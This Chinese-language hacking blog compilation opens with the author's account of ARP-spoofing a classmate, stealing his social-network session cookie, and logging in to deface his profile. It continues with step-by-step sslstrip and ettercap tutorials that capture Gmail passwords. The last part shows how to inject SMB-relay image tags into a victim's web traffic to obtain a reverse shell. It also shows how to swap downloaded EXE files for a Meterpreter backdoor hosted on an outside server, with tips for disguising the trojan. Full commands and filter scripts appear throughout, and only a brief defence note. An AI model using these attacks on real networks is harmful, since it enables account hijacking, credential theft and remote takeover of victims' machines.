男子汉大豆腐，焉能言而无信，谁料在我将死对方后，对方居然真的使用了绝技，死不认帐，耍赖皮。

俺只好将其行公布于校内网，结果连我们导师都鄙视那种行为，并鼓励我用板砖拍他。其他围观者也是无不愤然谴责之。谁料这厮利用舆论机器，在校内网颠倒是非、指鹿为马。偶只好进入其校内网，断其话语权，还事实真想于大众。

本来那厮用的网页登录很容易搞到其密码，谁知最近用了个校内网客户端，从那里进入网页，也就不用登录了。这下好，搞不到密码就搞他的cookie吧，反正一样。

ettercap出场，贴图

利用ettercap进行对目标arp欺骗以及嗅探找到目标跟校内网的tcp连接

查看会话校信息找到cookie

利用tamper data修改cookie成功登录校内网，还原事实真想并修改其头像恶搞一下

ppt传上来arpsniff-ssl

在线观看:

http://www.linux520.com/v/l00069/index.html

本教程不是原创，是使用黑帽大会上Moxie Marlinspike发布的一款叫sslstrip的工具，配合ettercap进行arp欺骗，可以突破经过ssl加密的协议(如https等，一种被动使用https协议的会受到攻击），进行局域网arp嗅探获得口令等信息,本教程不涉及原理，只讲应用，我尽量迅速录完节省大家时间 •仍然跟大家说声抱歉，因为个人原因最近比较惆怅，因此不爱说话，所以还是不录语音教程了，见谅！

 准备工作

下载sslstrip，我下载的是最新版本 •wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz

访问这里http://www.thoughtcrime.org/software/sslstrip/获得更多帮助

安装：

python setup.py install

开始之前先要打开 ip_forword转发，否而会出现一些错误，感兴趣的可以查找相关资料并自行测试…纸上得来终觉浅，屏幕上就更浅了，实践出真知

echo “1”>/proc/sys/net/ipv4/ip_forward

  使用Iptables过滤数据包

  iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000

通过iptables 把所有http数据导入到10000端口，我们用sslstrip监听10000端口，并得到我们想要的数据

参数讲解: -t:命令要操作匹配的表（net这个表表示被查询时遇到了新差生的连接包）

Net表有三个内建的链构成 PREROUTING(修改到来的包)、OUTPUT（修改路由之前本地的包）、POSTROUTING(修改准备出去的包)

-A表示在选择的链后加入更多选项

–p指被过滤包的协议

–destination-port 80指被过滤包的目的端口是80 •-j REDIRECT –to-port 10000 将80端口的数据跳转到指定端口传输

然后我们使用sslstrip监听10000端口

sslstrip -l 10000

  利用ettercap进行arp欺骗

  前面的视频教程已经讲过ettercap的基本用法在此不赘述

ettercap –T –q –M arp:remote /192.168.1.101/ //

Ettercap默认就会过滤密码，我们也不需要指定过滤脚本

  Ok开始测试

echo “1”>/proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000

sslstrip -l 10000

会在运行的当前目录生成sslstrip.log我们用ettercap不看这个也可以~~~

•Arp欺骗开始，我对我的物理机192.168.1.101进行攻击测试

ettercap –T –q –M arp:remote /192.168.1.101/ //

  好的开始了，我登陆gmail看看 Ettercap成功截获到了gmail的密码~~~

•这里用ettercap密码非常方便就看到了也可以查看sslstrip的日志文件，也是保存了我们的密码

严禁用于攻击别人银行等账号！这是一种盗窃！

下面说下防御

Sslstrip的攻击方式是一种中间人攻击，需要进行arp欺骗，所以在设置好浏览器本身安全的基础上，要绑定mac和ip等在网关和本机双向绑定，或者启用arp防火墙对arp攻击进行防御

Exploit iepeers vul whith ettercap and metasploit framework video

在线观看：

Exploit iepeers vul whith ettercap（上集）

http://www.linux520.com/v/l00066/l00066.html

Exploit iepeers vul whith ettercap（下集）

http://www.linux520.com/v/l00067/l00067.html

ppt传上来~~~

Exploit iepeers vul whith ettercap &&msf(ppt):

Exploit iepeers vul whith ettercap

写在前面的废话：

本教程是kindle童鞋写的，kindle教我不少东西，本来应该得到我等小菜感恩戴德，无奈这厮最近日站日多了，太累，最近发高烧，所以由偶代录，希望kindle看到本教程立马退烧继续日站 •跟大家说声抱歉，因为个人原因最近比较惆怅，对，也叫蛋疼，因此不爱说话，所以就不录语音教程了，见谅！请忽略白字谢谢！

视频地址稍后补上~~~

请访问linux520.com

作者：Mickey
前几天pt007 带我去玩，在车上讨论了下内网入侵的思路，当时说到了利用ARP 欺骗加上smbrelay
来得到主机cmdshell 的方法，又提到了一个当用户通过浏览器下载EXE 文件的时候，利用ARP 欺骗
把数据流都引到本地，然后替换成我们事先准备好的后门，再转发出去，这样当目标运行了下载的EXE
后，我们就能得到主机的访问权限了，今天下午正好无事，就找了找资料，测试了下，顺带的也学了
学Ettercap 的使用。
一．Ettercap+SMBRELAY
还是先说一下我的渗透测试平台，我用的是Ubuntu9.04,Ettercap 0.7.3,MetaSploit 3.2，我们先用
MetaSploit 里的SmbRelay 来监听本地的445，使用之前，如果本地有Samba 服务在运行的话，需要先关闭，否则会造成端口冲突的。首先运行msfconsole，命令如下：

sudo ./msfconsole
use exploit/windows/smb/smb_relay
set PAYLOAD windows/shell_reverse_tcp
set LHOST 192.168.1.52
set LPORT 53
exploit
这里我选择的payload 是反向连接到本地的53 端口的，运行效果如图：
接下来，我们编写Ettercap 的Filter,过滤脚本内容如下：
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data,”Accept-Encoding”)) {
replace(“Accept-Encoding”,”Accept-Mousecat”);
msg(“zapped Accept-Encoding!\n”);
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace(“</body>”,”<img src=\”\\\\192.168.1.52\\fvck.jpg\“> </body>” “);
replace(“</Body>”,”<img src=\”\\\\192.168.1.52\\fvck.jpg\“> </body>” “);
msg(“Filter Ran.\n”);
}
Ettercap 的filter 语法规则，可以通过man 8 etterfilter 来查看,我这里说说比较容易出错的地方，if 和
(之间必须有一个空格，每个if 语句块必须用{}来包含，只要注意这2点，基本上就没什么问题了。
简单说下这段filter 的含义，第一个if 语句块，如果ip 协议匹配TCP，并且目标端口是80的话，则搜
索HTTP 数据流的Accept-Encoding，并且替换为Accept-Mousecat，然后在控制台打印一条“zapped
Accept-Encoding”的消息，这么做的目的，是为了避免目标客户端浏览器像启用了GZIP 这样的数据压
缩功能。
第二个if 语句块，如果ip 协议匹配TCP,并且源端口是80的话，则搜索</body>和</Body>关键字，
并且替换为img，并且把img 的src 属性通过smb 方式指向我们用metasploit smbrelay 监听的445服
务，最后在控制台上打印”Filter Ran”运行的信息，如果你html 好的话，你也可以自己修改成其他的html
标签。
写好以后，用etterfilter 编译一下
etterfilter smbrelay.filter -o smbrelay.ef
效果如图：
接下来使用Ettercap 来进行arp 欺骗，我这里只对内网的192.168.1.67进行ARP 欺骗
ettercap -T -q -F smbrelay.ef -M ARP /192.168.1.67/ //
各参数意义如下：
-T:使用TEXT 模式启动
-q:启用安静模式
-F:加载指定的filter
-M:指定使用ARP 模块
当192.168.1.67 使用浏览器浏览网页的时候， 他浏览的所有网页里都会被插入<img
src=\\192.168.1.52\fvck.jpg>,这时候metasploit 也有响应了。我们得到了目标的cmdshell.
为了验证下，我刚才说的，使用新建立的用户登陆192.168.1.67,看下效果
当然了，用这个方法，如果有网马的话，也可以直接使用了，也可以进行XSS 攻击。
二．替换目标下载的exe 文件
我这里用msfpayload 生成一个反向连接的exe 后门（这里exe 命名成setup.exe/install.exe 的原因是，
可以绕过vista 的uac,当然是需要管理员2次点击的）
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.52 LPORT=8888 X
>/home/mickey/setup.exe
然后用msfcli 本地监听8888端口
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.52
LPORT=8888 E
编写filter 脚本
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, “Accept-Encoding”)) {
replace(“Accept-Encoding”, “Accept-Mousecat”);
msg(“zapped Accept-Encoding!\n”);
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace(“keep-alive”, “close” “);
replace(“Keep-Alive”, “close” “);
}
if (ip.proto == TCP && search(DATA.data, “: application”) ){
msg(“found EXE\n”);
if (search(DATA.data, “Win32″)) {
msg(“doing nothing\n”);
} else {
replace(“200 OK”, “301 Moved Permanently
Location: http://www.hackest.cn/tools/setup.exe“);
msg(“redirect success\n”);
}
}
原理是当目标下载windows 格式的exe 文件时，替换当前页面的http 响应信息202为301,并且重定向
到我存放木马的地方。
使用etterfilter 编译一下
Etterfilter smbrelay.filter -o smbrelay.ef
加载downexe.ef 过滤器，进行arp 欺骗
sudo ettercap -T -q -F downexe.ef -M arp /192.168.1.67/ //
当目标进行网上冲浪，并且下载exe 文件，并运行后，我们就得到主机的权限了，当然我这里做的比
较粗糙，可以使用绑定器或者winrar 把文件合并起来，并且修改下exe 文件的图标，这样就显的更真
实了。
现在登陆192.168.1.67看一下效果，并且做下验证
详细的过程，可以通过wireshark 抓包看的很详细
文章写的仓促，有错误的地方，和有好的思路的同学，可以联系我一起交流。